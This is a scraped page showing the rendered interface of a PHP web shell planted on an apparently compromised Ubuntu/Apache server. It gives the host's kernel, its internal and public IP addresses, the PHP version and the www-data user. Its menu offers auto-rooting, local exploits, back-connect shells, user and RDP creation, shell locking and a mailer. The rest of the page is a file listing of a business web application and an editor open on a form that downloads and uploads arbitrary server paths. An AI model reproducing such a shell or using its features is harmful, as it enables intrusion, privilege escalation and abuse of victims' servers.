Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64
Apache
: 172.26.7.228 | : 3.149.242.223
Cant Read [ /etc/named.conf ]
5.6.40-24+ubuntu18.04.1+deb.sury.org+1
www-data
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
var /
www /
html /
cnv /
bnu /
html_modules /
[ HOME SHELL ]
Name
Size
Permission
Action
captcha
[ DIR ]
drwxr-xr-x
captcha.html
599
B
-rwxr-xr-x
captcha.php
1.11
KB
-rwxr-xr-x
custom_upload_details.html
2.36
KB
-rwxr-xr-x
download_upload.html
2.34
KB
-rwxr-xr-x
setup_user_rights.html
2.73
KB
-rwxr-xr-x
setup_user_set_up.html
3.66
KB
-rwxr-xr-x
system_general_master_setup.ht...
5.25
KB
-rwxr-xr-x
system_general_master_setup.ph...
9.88
KB
-rwxr-xr-x
system_general_master_setup_08...
13.17
KB
-rwxr-xr-x
system_general_master_setup_13...
11.83
KB
-rwxr-xr-x
system_general_master_setup_wa...
13.25
KB
-rwxr-xr-x
system_transcation_series.html
4.82
KB
-rwxr-xr-x
system_user_schema_elements.ht...
13.84
KB
-rwxr-xr-x
system_user_schema_group.html
7.61
KB
-rwxr-xr-x
upload_details.html
4.94
KB
-rwxr-xr-x
upload_group_details.html
1.8
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : download_upload.html
<div class='col-md-12'> <div class='tabbable tabbable-custom boxless tabbable-reversed'> <ul class='nav nav-tabs'><li class='active' id='li_0'><a id='li_a_0' href='#module_generalmaster_div' data-toggle='tab'>General</a></li> </ul> <div class='tab-content' id='page_main_tab_div'> <div class='col-md-12' style='height:12px;'> <div class="portlet box purple1"> <div class="portlet-body form"> <!-- BEGIN FORM--> </div> </div> </div> <div class="portlet box red"> <div class="portlet-title"> <div class="caption"> <i class="fa fa-reorder"></i>Download </div> </div> <div class="portlet-body form"> <!-- BEGIN FORM--> <div class="form-body form-horizontal"> <div class="form-group"> <label class="col-md-3 control-label"><span style="color:#FC4170;">*</span> Path</label> <div class="col-md-4"> <input type="text" name="download_upload_path" id="download_upload_path" class="form-control"> </div> <div class="col-md-5"> <a class="btn btn-sm blue" onclick="downloadFileFromServer();" href="#">Download <i class="fa fa-download"></i></a> </div> </div> <div class="clearfix"></div> <h3 class="form-section">Upload</h3> <div class="form-group"> <label class="col-md-3 control-label"><span style="color:#FC4170;">*</span> File Name</label> <div class="col-md-4"> <input type="file" name="upload_to_server_file_name" id="upload_to_server_file_name"> </div> </div> <div class="clearfix"></div> <div class="form-group"> <label class="col-md-3 control-label"><span style="color:#FC4170;">*</span> File Path</label> <div class="col-md-4"> <input type="text" name="download_upload_file_path" id="download_upload_file_path" class="form-control"> </div> <div class="col-md-5"> <a class="btn btn-sm red" onclick="UploadFileToServer();" href="#">Upload <i class="fa fa-upload"></i></a> </div> <div class="clearfix"></div> </div> </div> <!-- END FORM--> </div> </div> </div> </div> </div>
Close